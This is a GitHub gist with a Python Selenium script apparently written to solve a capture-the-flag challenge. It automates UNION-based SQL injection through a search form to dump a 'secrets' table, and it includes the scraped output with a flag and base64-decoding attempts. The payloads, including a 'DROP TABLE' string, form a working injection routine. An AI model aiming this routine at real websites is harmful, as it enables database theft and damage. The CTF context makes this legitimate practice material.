Created
July 26, 2017 21:15
-
-
Save amalmurali47/fbfa1562e972ff98fde63bcead677de7 to your computer and use it in GitHub Desktop.
Automation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # -*- coding: utf-8 -*- | |
| import selenium, re | |
| from selenium import webdriver | |
| from selenium.webdriver.support.wait import WebDriverWait | |
| browser = None | |
| should_log = False | |
| def log_print(str): | |
| if should_log: | |
| print str | |
| def create(): | |
| global browser | |
| log_print("create browser") | |
| browser = webdriver.PhantomJS('/home/user/tools/PhantomJS/phantomjs-2.1.1-linux-x86_64/bin/phantomjs') | |
| def inject(payload): | |
| log_print("goto url") | |
| browser.get('https://handcrafted.kaizen-ctf.com/') | |
| log_print("input payload") | |
| browser.find_element_by_id('search').send_keys(payload) | |
| log_print("submit") | |
| browser.find_element_by_tag_name('form').submit() | |
| # log_print("wait") | |
| # WebDriverWait(browser, 9999).until(lambda x: x.current_url != LOGIN_URL) | |
| log_print("parse result") | |
| column1 = browser.find_element_by_xpath('/html/body/div/div/h3').text | |
| column2 = browser.find_element_by_xpath('/html/body/div/div/p[last()]').text | |
| return column1, column2 | |
| if __name__ == '__main__': | |
| """ | |
| create() | |
| results = dict() | |
| column_names = ['eat', 'sleep', 'pwn', 'repeat', 'union select', '*', '; DROP TABLE users--', 'hack_the_planet'] | |
| for name in column_names: | |
| results[name] = []; | |
| for i in range(25): | |
| for j in range(0, len(column_names), 2): | |
| c1, c2 = column_names[j:j+2] | |
| r1, r2 = inject("' union select 0, `%s`, `%s` FROM secrets LIMIT 1 OFFSET %d -- " % (c1, c2, i)) | |
| results[c1].append(r1) | |
| results[c2].append(r2) | |
| print '.' | |
| print i, repr(results) | |
| print "FINAL RESULTS:", repr(results) | |
| """ | |
| results = {'repeat': [u'aZ6EUJMwfT&dxk%Je=F87R@DZdHajhX', u'!f0Bvob&9x!{1w^U4eO%4Kvf,opUCTD#G', u'##jukIKHkNitYQKdwnR*%2Jpi6r', u'DLZTiBS1B^vIb3', u'%Rwkr@sbeX$7D_Zi7A9TyXxutKuebSDy!9c8', u'n)Ff!.mw59wL', u'RdI7u#9y2UH_=qoh1PaG', u'RcoLgOnZujnva.pfIcO^Cpe2GODn@rQPwg$bzteLNJrc4WXva', u'm$IN})de!Yh@ nQAiCVHGYEAjN)_mZ!v(', u'gH6_g0m5,MSPU4Xfaav!%Yfk7p=rYU6c#5vwh%4}', u'az4ahI.!dNoc(JqZFMoHsCpu{iP%,a_ PSnFQt,WXX7', u'GjJ S7z{XS88)VJqeKj9Wzqm', u'g89kP1 qSsUnjv7Js7cEttEaasPwIU&,@ht%,CsyL&o{N*OL', u'm_wHs8Wt9XcnUjx8$hjc0rlX)4^3Mj==319#WpJ*th%7K 1VJ', u'D8Ym(($zw=NAB=F2YdS', u'fM(n)2bVrvceNkEa4T9cqM6jCX ml_}&d0aTT_B*', u'8ViWMeir2HTxi', u'JZ=d1_g(n7b@xP0#CJZ@kBg(5KW', u'Dqz61Flcv5e#FV JkCN8vn=%.U%7#+%# }(aaP4eyZI^', u'DsU,O2f,}xasr.V', u'_TYM)', u'8.7KWsOYoSU*Ao9%', u'aszn%cUS+Wvf%0AkK', u'eOontCxrlB6X#!C,GdouR8*RWUB&G5#oQb(ikE@5u@}tN){', u'zeggu04Lm($_Afd'], '*': [u'9)Fdz%6WB2T^,z$bwZG1yU$AxGu+kZB#qBUVN7^QE7G#%RYw', u'VA5IQIV)!e!t', u'S75l%l,6bXQ#hWL v=4=', u'xmppYRBjtyEp^, .&$lRdroKi1%VD#wzJt_9X}$fzAl', u'gM3oOh%JNY', u'0AB1OPNkCf4,', u'GLhqg$}', u'T 88ZFrLi( ZAq@KmLUzO,zUL0Y.QUH2+onL4W!Zl_1', u'cp6kkCI', u'V(9errd6wz UFSk48FR&I)1uyCt#mMBX0_aQX07P*jM0u', u'Tr6hT5^sXRtc{{A,O+#4j7l#pNA.N=6fKHv)d', u'qAQJkO', u'JN^_vBGz&T_1U0OZrttAu8a}7lVz6K.ujuI^gl6KChdS@l..', u'n^E%9ClPX{ux_$WJItxd@3p16OP', u'KAIZEN{if_every1_used_prepared_stmts_th1s_chall3nge_w0uldnt_ex1st}', u'idKn#CB8HCA*Lst(c3@xTuE=,OgfFeH3q8Y', u'n83gJ,)*YDmfTo8Xo.e},b=a1+,', u'skchsmQTb!J_g', u'd=qq}EOCNdDQL.', u'=m{in#THv+_', u'mH(oZM31DUtb&F2Y#$0AHu=hg{jzK)u4rgN#6T5zZ.TS', u'SZ)ZeFQCg90n )}$TjNuj9MXCSCvrT4O', u'XwySyG,h aLfy*7A.f', u'5OsBcpP^Vezni', u'1,(eFFa)Va8qw8+X,Mfu=X(73,2daoIv)DHaq3}W(mI27e'], '; DROP TABLE users--': [u'd&n_ZIOopV5pyc}Q5{!', u'Qu&+u*yuZyv{0W', u'biyI5)P.)2@SM', u'8C=Va^V((my) Amkd$VAF6 W5C_7O!g$4HMna9VRAfU)&,', u'x6lGYFeZiMmAz', u'bnLvkazcmxnm6AFb', u'+vjS!9', u'jpx%qO*f(.}fJ}O$C!5ByVUs)', u'QCFNI6{SEQ.DjO6I{iA^ uC7t)=16YwwaO3@00', u'mLn70pBLpPsJB5gi(ue,WeYsLaLQ{EN', u'Y7f.K_iS98w01e#gLR_(8hXZm', u'(7EOH)w', u'9TEC21)=jL+FExX_f_KQ146GwFVph#YE%&)gPwQH*', u'KI', u'PurtV=E+.G5qPaQpSk{r^kC_9WHAKTHq(}dB,Qbi7f*bIS', u'IV$hUlL=eJS+rhi$A{*hY7*kgKBWhKeDZgZ1kQ^Z', u'CjOL1sFc&I(Ma9wbCI6%qPTHcixcfl', u'x}d63^WKZVUnA{', u'oTwSPp)=Z@%@^N%!GSS', u'Ngbu=C3Dx@q7b98},sIACiXqjAAKFV2f3+zRt', u'=VUc% xUV.!hx#Xf8#Cr+pi', u'xYizu', u'QNm!no}2{AD^kZAV,jPL@+*^YF@S&', u'9y%NM=f1ci=UaqzPxAv@lp}bZih4)NC)FtPXh4,}BWo5KuM', u'jFp,E!^(tkmGPleEA+&uqtP)zAUgmk6gAeIzM'], 'union select': [u'kDC8DItwenKcN4C%L0xK!q(U#8KsPFOx33t%rv2EhLBF', u'rCcJCX!OacG&KF9b3qobXzXFpJaYi&Y^pr,.GcaykREeLS*.Fa', u'48pcSbR4MlSDY4TOPMKs6TL&%!6)+nMSqY#', u'Fu}o.QLX^^YZ{Gf+Z$X*hHUGC6^*4GlBu),I6(BE,_!JWG8M', u'&#nP$o3EqWZVSVBvK1MIfiNYURxgx', u'&(=ULwC%!x!FZuyi$vO^Z6&c!*NmuY ^)T+sbKJ', u'y,}+MBnGXoMn4!9#', u'2HE!zm5jR=G5.LkhIQ=MPXEz,N', u'_b%b=,}OSOiaEm!_(me{$#f1A5k4eyuf4y_KWc.@Y3$', u'4Y3iDFzft}iA', u'NPI!((%nSvS,8(v$&Rc,DIigDClNrt6K Cw)VUyI', u'Wj7{}DSWe5@gGHJ8l^nxyLT.GzC*0zkMzXlQIzvJCm6bcL', u'i6mT%f^D9(n3SAxUh7!}n(tWG1n6svQv&lAys{MgyaNm.4C', u'wuuK!2PJ(cQeEyvORX%Zp3i&!Z 8D%x,WOdqcZvoa6uR73Gyb.', u'yE7Hw9.568LH5G#f7=fzmZ=hCULh=H}IYax', u'J25oBn', u'FAkfs+1F!br){^cgD Kv%zi8hb%2rP(', u'aIxIEYj!d$D2#f48)FZHiElKvqu5pGJY0zk', u'o}Qf{%P8db', u'6R8XSGeP@wUxn0W8OSLW7&jMIVGx UjIyf D6GEVP_EMx', u'*=aF(', u'YCqE!FX1(vOU^MY==At)#kHnk@uF+9=ZI$Q 4myDdnrVRwa', u'j%y+#z9__NgcN1(LI#IT^s6RL+XaVE{HFIq!KQh5C67', u'!aOIGVM3$x8*YE', u'VLK@i#=8sK&}P^^@D2Ve Dd!EsGrU2YfDs'], 'sleep': [u'p2}+R0ch=)5o@.au9leHLesN$ .', u'd6XB#$Jh', u'E=&%iqP$tRD&=yo7ZaFuz2@i8sQ}pzDfwT', u'OR.^@{d811vs.uD=0mqhTM!lqr', u'1=,Qr12vT0Si@= &5*I,49*=^R', u'd=WHnI(aBdN1Td9Ut zwWhyC4TI={8=xPM', u'SlgKw.fC)j9iFy*Fc', u'i0q!sc', u'1PtjVS@9G8$pEa)Hw86( pkxbDLHjd6(*.xVb@xQZBe$t0GHh', u'{h}TQu1Ki,$DmRE,p@*nzj+AqGVFwIOp1)(lhXrgwVtQ7GSH', u'NAMd#,ZOcsloioJROW', u'4rz(5,P%K05C^f6#2QvTj4n', u'xlGuu,$,zHsH3PIJhotY5InR2m1#', u'vVmZDRNPZwJ7!YB5{+l5%^', u'o*2^MHF@tcqhAfe!EbVOGv', u'U7Mw^', u'S,J 07e%C7}L.wi=N&Uh9hdk5ALrNK2', u'm(GnIAS}lfv42CM+Z}JdY_MS^c&cLzlwRnL', u'eqD f@{p5+yqNcXT)I(EtdaI', u'2inm+D8$^e+HEX OnATC+FmU&SFc+jh', u'V2$or#rW&J', u'Jl6GC%Rq9s', u'O+ANCRiPKuQFivaR5U=N2$IJQH{9 1^XP=s', u'7(4%CpJ%L&', u'dYVaSfzx.UTW&N#s{l3#}a! #w$T}=j'], 'hack_the_planet': [u'3Y_kSX_2A^Md5', u'^2O3hG9.^5Ty#lXhl(3', u'oIk5)p aZL{*rmZBeg@ %W130d8S$Yk.0GGe', u'CecUhb{BXj1)=9a+ VqDbBT^ RVO1KF9G(eVww2+y%iBV', u'nl9F_', u'P6zTc^d@ N&$68ug5IIyIZDjA(tpc_7IyMWYLqh6Uj', u'({Ecw289_nd.WgM+', u'2Ub_f.w', u'Hc)8ex=sSJ*p.8pSi', u'TjXukIf#rIIBt_X', u'Es#MNMQE)zwlwzuA$,xMIQ.&%JO%nxe', u'wFuZkz@xc0PK+0X+', u'xdtynv_B*', u'tp!71Cj)vlFV', u'YB+40L_W#GBy7wi(g$(@)R4$X!AFZT#q73Y^A', u'kDg0vDwfShPh4uuwVMYyAp%gYHaJv$ IZ!S+*3=K.E45', u'4#rmn8Lip}_+2UbfvJ3yysxyX6PJKC2K(q^LTMSZ 8Rq', u'Irpt9z5e,TRbukg=$q. Jm$+IFU&j%EzDD', u'Hn%C,sIi(Z9Lh*I}XnF', u'w,F%1#)', u'EnNQ0Adhlv+TJ7=k}B@j', u'gdVX.x@q8Lvj$yWu8Ftn0(&HHmZ', u'3jBs)INGtOG*AVVi', u'la1TRKYhts42y(&wh)bEQ8m$#ZY)ivI9l%&MU{', u'A$&0qgo^vYn4sxIs2mxCN#m8NT4h7T@jkKmG.'], 'pwn': [u'yso^Ou#l.ZG^kWFEgXtQq', u'gu.78MFL0BHJmL%&zY}B2np2NZK2J', u'&PmDT1ETX$8JeDwRnE%$$IdP=%zhC3ZGZO', u'Y!(Je &@', u'$H_W9Qa,6y,(BIy3QYdYNCJGI K3xM2&b2', u'dErCc,jnBQSIL#+PntJ_RHc{ZL3Mm0UW2KhKfPqSJ52l*', u'%PSPp4#BfifAKVTSr7gyG$wx&Wb11', u'}$#SwHvq42qoFb60 T^OfmdJI,ETLR3{jB9I$r', u'ExK#Rq*VS&!Rqv&aXgxkexPJ=$ttCpJXKYh5bhlACH0(tC6{U', u'VAf+{ 37E', u'5alezbFG.F)rg+GubH(SDsa1e5i&_$#KoqncKcQ+HR6QSyn', u'i}v8,dT0FmEm5=NS_!&3p3u(t=', u'}GPAX,zP^u.^ERb$QjjKLbT.}', u'_GceJrr}U+sMfjClmXMpadj0e(PZ{i4^B}RLmYzH.g@X9', u'ZJ&h$ZU7Xv!vN+(eul(nKiVweJSPjJWRc&Gv8$3JKW}WM', u'KfbqAS.Y3JC$&b8&4k)Ri_S', u'Hd1JMygCQR8mS=7Ava.(3YEslC#qz9k6BAepdG%Sj', u'9d8UkR6B(x91f m9VnWkYdWLNC^i#6 8ARu0dMwj5 .KatD', u'$NG2x%n{4r{VbC_mVz)ILTUfHBPW!{2A{m(_3}9hT', u'(nbp.Sfk1mHpMJY_hhq^=R+a_bB(8kPg^9#Iugz', u'XVb!fIJkE#Ot kdSumB', u'm)V1E{m0z)q^ogGe', u'Bog&A1DwkFM)BOBaVtVGj3W& qH(oBE.V$+BS.', u'zBu,mn6B5UDa$x{L!or$4BeM#{At(t&Q,', u'jL ^cvq%T^_$H+*HFdDfV%'], 'eat': [u'#GGeiQ+q.W4jD,(eiHiz(kK49Ez', u'(RovQ7#%#', u'*y!xO)mQkXsj5 V', u'0*8e6GKo4VOTi+39q{JL+mQa=_ 6(rX)R6hj#', u'0.d.Q}0R^U2{7e6a&j)&HPlb3{NX^Pr!EjANlE', u'11J9V5+,PxwMAw354', u'4lyQzq)CE', u'4Y!04.&wXp$si{KU(NiOgY!NBr', u'5n=Ac&S)_ #9FZ(U{g%psA#Hpt Z^Q2E', u'74F+,N=qVTpd6#', u'7F!qN3NSk(r8nfJ^KLkK0', u'9Pe8A4!UbT2(x*#O', u'@q@i=ed0H*#*c9eK_!}5FwDw2*OJpG)Kl,#)', u'BFd9g', u'Bg(P5_c&^ch#fnTK', u'coIkEeKdp^9Ci3XS7_rVZvRhuw{ul}whDJUtm.%48PR0%F8KD', u'G2t47ijU4oSV=0A8N21.', u'GX.9PFtT5q@bJ9ae', u'Mp&pUrHj={nc}BZtZp$Gb.)+ G0W%s', u'Nyx7GXij&BEDHPjItxX@fExifL#$cpH%j!UaUD1t_', u'wL@B5&uav{KRFrpxYEwzDqO', u'xUbs%qyBpwf@p0!WNpI2g8&pxD56O5JK0*KHPBY=p^o,! _XK', u'y#y0NLj7cSdILFdFrimr,s}=H&&m', u'z2K_d', u'^#LEvPHn)m%lIF7@q0SWxA}ICqJQHuR+6oFVjFZ_qw1JdRwZ']} | |
| column_names = ['eat', 'sleep', 'pwn', 'repeat', 'union select', '*', '; DROP TABLE users--', 'hack_the_planet'] | |
| from base64 import b64decode | |
| str1 = str2 = str3 = str4 = str5 = '' | |
| str12 = str22 = str32 = str42 = str52 = '' | |
| for name in column_names: | |
| # print "%s: %s\n\n" % (name, ''.join(results[name])) | |
| for x in results[name]: | |
| str1 += x | |
| str12 = x + str12 | |
| try: print b64decode(x) | |
| except: print "fail1" | |
| x = ''.join(results[name]) | |
| str2 += x | |
| str22 = x + str22 | |
| try: print b64decode(x) | |
| except: print "fail2" | |
| x = ''.join(results[name][::-1]) | |
| str3 += x | |
| str32 = x + str32 | |
| try: print b64decode(x) | |
| except: print "fail3" | |
| for i in range(len(results['eat'])): | |
| x = ''.join(results[name][i] for name in column_names) | |
| str4 += x | |
| str42 = x + str42 | |
| try: print b64decode(x) | |
| except: print "fail4" | |
| x = ''.join(results[name][i][::-1] for name in column_names) | |
| str5 += x | |
| str52 = x + str52 | |
| try: print b64decode(x) | |
| except: print "fail5" | |
| for x in ['str1', 'str2', 'str3', 'str4', 'str5', 'str12', 'str22', 'str32', 'str42', 'str52']: | |
| try: | |
| y = b64decode(eval(x)) | |
| print y | |
| open('%s.bin' % x, 'wb').write(y) | |
| except: print "fail", x |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment